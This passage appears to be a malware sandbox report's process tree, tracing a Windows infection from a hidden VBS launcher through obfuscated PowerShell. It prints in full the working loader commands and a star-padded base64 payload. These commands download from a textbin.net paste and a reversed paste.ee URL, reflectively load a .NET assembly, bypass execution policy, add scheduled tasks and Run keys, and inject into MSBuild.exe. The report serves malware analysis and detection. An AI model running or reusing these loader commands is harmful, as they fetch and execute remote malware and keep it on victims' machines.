cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        
        PID:4488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:5228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:2428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:5872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:4188
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:5600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:5700
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:2232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:3660
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5724
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:4848
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        
        PID:1432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:4176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:4120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:4492
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:3784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4328
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:6048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:3176
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:5220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:1604
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:1556
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:880
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5236
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M